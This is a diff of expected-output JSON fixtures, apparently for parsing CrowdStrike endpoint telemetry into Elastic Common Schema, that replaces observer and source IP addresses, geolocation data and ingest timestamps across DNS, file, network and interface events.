@@ -1726,24 +1503,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-DC", - "city_name": "Washington", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "District of Columbia", - "location": { - "lon": -77.0148, - "lat": 38.8898 - } - }, - "address": "208.198.160.35", - "vendor": "crowdstrike", - "ip": "208.198.160.35", "serial_number": "ffffffff7ecf4e61bba14ca5ac5d17b1", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:35.806Z", "ecs": { 
@@ -1751,18 +1516,18 @@ }, "related": { "hosts": [ - "208.198.160.35" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.198.160.35" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465559800Z", - "original": "{\"event_simpleName\":\"DnsRequest\",\"ContextTimeStamp\":\"1625677475.806\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364977197365370629\",\"DomainName\":\"jss.dom1.com\",\"ContextThreadId\":\"0\",\"aip\":\"208.198.160.35\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"DnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-9644-060415b1fd87\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff7ecf4e61bba14ca5ac5d17b1\",\"timestamp\":\"1625677476111\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"28\"}", + "ingested": "2021-12-09T13:36:11.150696600Z", + "original": "{\"event_simpleName\":\"DnsRequest\",\"ContextTimeStamp\":\"1625677475.806\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364977197365370629\",\"DomainName\":\"jss.dom1.com\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"DnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-9644-060415b1fd87\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff7ecf4e61bba14ca5ac5d17b1\",\"timestamp\":\"1625677476111\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"28\"}", "created": "2021-07-07T17:04:36.111Z", "kind": "event", "action": "DnsRequest", 
@@ -1800,24 +1565,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WV", - "city_name": "Hurricane", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "West Virginia", - "location": { - "lon": -81.9947, - "lat": 38.4203 - } - }, - "address": "208.180.129.90", - "vendor": "crowdstrike", - "ip": "208.180.129.90", "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.770Z", "file": { 
@@ -1834,19 +1587,19 @@ }, "related": { "hosts": [ - "208.180.129.90" + "67.43.156.14" ], "hash": [ "2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9", "1620585913" ], "ip": [ - "208.180.129.90" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465566600Z", - "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677504.770\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"365053504406857894\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"208.180.129.90\",\"SHA256HashData\":\"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9\",\"FileIdentifier\":\"05000001000000000000000000000000b588050000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677540055\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/BitBar/countdown_timer.1s.py\"}", + "ingested": "2021-12-09T13:36:11.150702900Z", + "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677504.770\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"365053504406857894\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9\",\"FileIdentifier\":\"05000001000000000000000000000000b588050000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677540055\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/BitBar/countdown_timer.1s.py\"}", "created": "2021-07-07T17:05:40.055Z", "kind": 
"event", "action": "NewScriptWritten", @@ -1872,8 +1625,23 @@ "type": "linux" }, "source": { - "address": "ff88:1:1:ffff:440a:57ff:fe3a:8abc", - "ip": "ff88:1:1:ffff:440a:57ff:fe3a:8abc" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -1882,21 +1650,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffbfbf4ff5aa56a26ad3c1a942", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:26.386Z", "ecs": { 
@@ -1904,20 +1663,20 @@ }, "related": { "hosts": [ - "208.203.151.21", - "ff88:1:1:ffff:440a:57ff:fe3a:8abc" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1156120155" ], "ip": [ - "208.203.151.21", - "ff88:1:1:ffff:440a:57ff:fe3a:8abc" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465573400Z", - "original": "{\"InterfaceIndex\":\"186\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"event_platform\":\"Lin\",\"LocalAddressIP6\":\"ff88:1:1:ffff:440a:57ff:fe3a:8abc\",\"ConfigStateHash\":\"1156120155\",\"name\":\"LocalIpAddressRemovedIP6LinV1\",\"aip\":\"208.203.151.21\",\"id\":\"ffffffff-1111-11eb-b3c1-02ff598b7945\",\"aid\":\"ffffffffbfbf4ff5aa56a26ad3c1a942\",\"timestamp\":\"1625677526386\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150709200Z", + "original": "{\"InterfaceIndex\":\"186\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"event_platform\":\"Lin\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1156120155\",\"name\":\"LocalIpAddressRemovedIP6LinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-b3c1-02ff598b7945\",\"aid\":\"ffffffffbfbf4ff5aa56a26ad3c1a942\",\"timestamp\":\"1625677526386\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:26.386Z", "kind": "state", "action": "LocalIpAddressRemovedIP6", 
@@ -1955,21 +1714,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.130.71.241", - "vendor": "crowdstrike", - "ip": "208.130.71.241", "serial_number": "ffffffff24db47799d1a85aae61dc7bc", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:59.994Z", "file": { 
@@ -1983,18 +1733,18 @@ }, "related": { "hosts": [ - "208.130.71.241" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.130.71.241" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465580200Z", - "original": "{\"event_simpleName\":\"DirectoryCreate\",\"ContextTimeStamp\":\"1625677499.994\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053555029062046\",\"ContextThreadId\":\"0\",\"aip\":\"208.130.71.241\",\"Flags\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"0\",\"Entitlements\":\"15\",\"name\":\"DirectoryCreateMacV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"VnodeType\":\"2\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff24db47799d1a85aae61dc7bc\",\"TargetDirectoryName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\",\"timestamp\":\"1625677500089\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\"}", + "ingested": "2021-12-09T13:36:11.150715400Z", + "original": 
"{\"event_simpleName\":\"DirectoryCreate\",\"ContextTimeStamp\":\"1625677499.994\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053555029062046\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"Flags\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"0\",\"Entitlements\":\"15\",\"name\":\"DirectoryCreateMacV1\",\"id\":\"ffffffff-1111-11eb-92d2-0286f570f8e1\",\"VnodeType\":\"2\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff24db47799d1a85aae61dc7bc\",\"TargetDirectoryName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\",\"timestamp\":\"1625677500089\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871\"}", "created": "2021-07-07T17:05:00.089Z", "kind": "event", "action": "DirectoryCreate", @@ -2032,44 +1782,14 @@ "type": "linux" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.216.236.59", "port": 443, - "ip": "208.216.236.59" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 701, - "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" - } - }, - "address": "208.210.109.249", "port": 40394, - "ip": "208.210.109.249" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" 
@@ -2078,27 +1798,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:WBJ0F0b/ydQaj5yTFJeZRrxW9nw=", + "community_id": "1:UVftVVD3gVlBx8wJQBdaiJYrD6A=", "transport": "tcp", "iana_number": "6", "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.129.250", - "vendor": "crowdstrike", - "ip": "208.233.129.250", "serial_number": "ffffffff58de4e748d9f64c85a9b49e6", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:17.658Z", "ecs": { 
@@ -2106,22 +1817,20 @@ }, "related": { "hosts": [ - "208.233.129.250", - "208.210.109.249", - "208.216.236.59" + "67.43.156.14", + "67.43.156.13" ], "hash": [ "1479784503" ], "ip": [ - "208.233.129.250", - "208.210.109.249", - "208.216.236.59" + "67.43.156.14", + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465587300Z", - "original": "{\"LocalAddressIP4\":\"208.210.109.249\",\"event_simpleName\":\"NetworkCloseIP4\",\"ContextTimeStamp\":\"1625677517.658\",\"ConfigStateHash\":\"1479784503\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"84424232977619\",\"RemotePort\":\"443\",\"aip\":\"208.233.129.250\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"40394\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP4LinV6\",\"id\":\"ffffffff-1111-11eb-9015-02e89cda7d5f\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff58de4e748d9f64c85a9b49e6\",\"RemoteAddressIP4\":\"208.216.236.59\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677517986\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150721900Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"NetworkCloseIP4\",\"ContextTimeStamp\":\"1625677517.658\",\"ConfigStateHash\":\"1479784503\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"84424232977619\",\"RemotePort\":\"443\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"40394\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP4LinV6\",\"id\":\"ffffffff-1111-11eb-9015-02e89cda7d5f\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff58de4e748d9f64c85a9b49e6\",\"RemoteAddressIP4\":\"67.43.156.13\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677517986\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:17.986Z", "kind": "event", "action": "NetworkCloseIP4", 
@@ -2162,21 +1871,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.93.153.49", - "vendor": "crowdstrike", - "ip": "208.93.153.49", "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:56.750Z", "ecs": { 
@@ -2184,18 +1884,18 @@ }, "related": { "hosts": [ - "208.93.153.49" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.93.153.49" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465594200Z", - "original": "{\"VolumeMediaName\":\"AppleAPFSMedia\",\"VolumeDeviceProtocol\":\"PCI-Express\",\"VolumeDeviceVendor\":\"\",\"ContextThreadId\":\"0\",\"VolumeMediaContent\":\"41504653-0000-11AA-AA11-00306543ECAC\",\"VolumeMediaEjectable\":\"0\",\"aip\":\"208.93.153.49\",\"VolumeAppearanceTime\":\"1625677422.647\",\"VolumeDeviceModel\":\"APPLE SSD SM0256L\",\"VolumeMediaBSDName\":\"disk1s3\",\"VolumeMountPoint\":\"/Volumes/Recovery\",\"event_platform\":\"Mac\",\"VolumeType\":\"APFS\",\"VolumeMediaRemovable\":\"0\",\"VolumeMediaBSDUnit\":\"1\",\"VolumeFileSystemDriver\":\"apfs\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"VolumeMediaSize\":\"250685575168\",\"EffectiveTransmissionClass\":\"2\",\"VolumeBusName\":\"IONVMeController\",\"timestamp\":\"1625677496804\",\"VolumeMediaBSDMinor\":\"8\",\"VolumeMediaWritable\":\"1\",\"event_simpleName\":\"FsVolumeMounted\",\"VolumeDevicePath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1\",\"VolumeName\":\"Recovery\",\"ContextTimeStamp\":\"1625677496.750\",\"VolumeSectorSize\":\"4096\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053546767850587\",\"VolumeBusPath\":\"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController\",\"VolumeDeviceInternal\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"VolumeUUID\":\"85400FAD-01F9-0442-8C5D-441F365D4909\",\"VolumeDeviceRevision\":\"CXS4LA0Q\",\"Entitlements\":\"15\",\"name\":\"FsVolumeMountedMacV1\",\"VolumeMediaBSDMajor\":\"1\",\"VolumeMediaPath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L 
Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"VolumeMediaUUID\":\"AD0F4085-F901-4204-8C5D-441F365D4909\",\"VolumeMediaWhole\":\"0\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", + "ingested": "2021-12-09T13:36:11.150728200Z", + "original": "{\"VolumeMediaName\":\"AppleAPFSMedia\",\"VolumeDeviceProtocol\":\"PCI-Express\",\"VolumeDeviceVendor\":\"\",\"ContextThreadId\":\"0\",\"VolumeMediaContent\":\"41504653-0000-11AA-AA11-00306543ECAC\",\"VolumeMediaEjectable\":\"0\",\"aip\":\"67.43.156.14\",\"VolumeAppearanceTime\":\"1625677422.647\",\"VolumeDeviceModel\":\"APPLE SSD SM0256L\",\"VolumeMediaBSDName\":\"disk1s3\",\"VolumeMountPoint\":\"/Volumes/Recovery\",\"event_platform\":\"Mac\",\"VolumeType\":\"APFS\",\"VolumeMediaRemovable\":\"0\",\"VolumeMediaBSDUnit\":\"1\",\"VolumeFileSystemDriver\":\"apfs\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"VolumeMediaSize\":\"250685575168\",\"EffectiveTransmissionClass\":\"2\",\"VolumeBusName\":\"IONVMeController\",\"timestamp\":\"1625677496804\",\"VolumeMediaBSDMinor\":\"8\",\"VolumeMediaWritable\":\"1\",\"event_simpleName\":\"FsVolumeMounted\",\"VolumeDevicePath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1\",\"VolumeName\":\"Recovery\",\"ContextTimeStamp\":\"1625677496.750\",\"VolumeSectorSize\":\"4096\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053546767850587\",\"VolumeBusPath\":\"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController\",\"VolumeDeviceInternal\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"VolumeUUID\":\"85400FAD-01F9-0442-8C5D-441F365D4909\",\"VolumeDeviceRevision\":\"CXS4LA0Q\",\"Entitlements\":\"15\",\"name\":\"FsVolumeMountedMacV1\",\"VolumeMediaBSDMajor\":\"1\",\"VolumeMediaPath\":\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController
/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"VolumeMediaUUID\":\"AD0F4085-F901-4204-8C5D-441F365D4909\",\"VolumeMediaWhole\":\"0\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:04:56.804Z", "kind": "event", "action": "FsVolumeMounted", @@ -2249,27 +1949,9 @@ "type": "linux" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "VI-C", - "city_name": "Christiansted", - "country_iso_code": "VI", - "country_name": "U.S. Virgin Islands", - "region_name": "Saint Croix Island", - "location": { - "lon": -64.7056, - "lat": 17.7468 - } - }, - "as": { - "number": 14434, - "organization": { - "name": "VI POWERNET, LLC" - } - }, - "address": "208.30.117.28", "mac": "0e-d6-ff-ff-ff-63", - "ip": "208.30.117.28" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -2278,21 +1960,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.54.217", - "vendor": "crowdstrike", - "ip": "208.233.54.217", "serial_number": "ffffffff190e436aaebc3892bcda5beb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:14.374Z", "ecs": { 
@@ -2300,20 +1973,18 @@ }, "related": { "hosts": [ - "208.233.54.217", - "208.30.117.28" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.233.54.217", - "208.30.117.28" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465601100Z", - "original": "{\"LocalAddressIP4\":\"208.30.117.28\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677513.841\",\"aip\":\"208.233.54.217\",\"PhysicalAddress\":\"0e-d6-ff-ff-ff-63\",\"InterfaceAlias\":\"eth0\",\"InterfaceIndex\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP4LinV1\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffff190e436aaebc3892bcda5beb\",\"timestamp\":\"1625677514374\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150734500Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"1156120155\",\"CreationTimeStamp\":\"1625677513.841\",\"aip\":\"67.43.156.14\",\"PhysicalAddress\":\"0e-d6-ff-ff-ff-63\",\"InterfaceAlias\":\"eth0\",\"InterfaceIndex\":\"2\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"InterfaceType\":\"1\",\"name\":\"LocalIpAddressIP4LinV1\",\"id\":\"ffffffff-1111-11eb-9c94-0222a21bbb27\",\"PhysicalAddressLength\":\"6\",\"aid\":\"ffffffff190e436aaebc3892bcda5beb\",\"timestamp\":\"1625677514374\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:14.374Z", "kind": "state", "action": "LocalIpAddressIP4", 
@@ -2342,8 +2013,23 @@ "type": "macos" }, "source": { - "address": "ff88:1:1:ffff:442a:7bff:fe75:9ed", - "ip": "ff88:1:1:ffff:442a:7bff:fe75:9ed" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -2352,21 +2038,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:40.056Z", "ecs": { 
@@ -2374,20 +2051,20 @@ }, "related": { "hosts": [ - "208.165.30.176", - "ff88:1:1:ffff:442a:7bff:fe75:9ed" + "67.43.156.13", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176", - "ff88:1:1:ffff:442a:7bff:fe75:9ed" + "67.43.156.13", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465607800Z", - "original": "{\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"LocalAddressIP6\":\"ff88:1:1:ffff:442a:7bff:fe75:9ed\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"InterfaceIndex\":\"8\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP6MacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150740700Z", + "original": "{\"event_simpleName\":\"LocalIpAddressRemovedIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"InterfaceIndex\":\"8\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP6MacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "state", "action": "LocalIpAddressRemovedIP6", 
@@ -2416,9 +2093,24 @@ "type": "macos" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "mac": "c2-27-b0-27-83-0f", - "address": "ff88:1:1:ffff:c027:b0ff:fe27:830f", - "ip": "ff88:1:1:ffff:c027:b0ff:fe27:830f" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -2427,21 +2119,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.176.144.39", - "vendor": "crowdstrike", - "ip": "208.176.144.39", "serial_number": "ffffffff0ad7494e8e817b3903f4eebb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:21.723Z", "ecs": { 
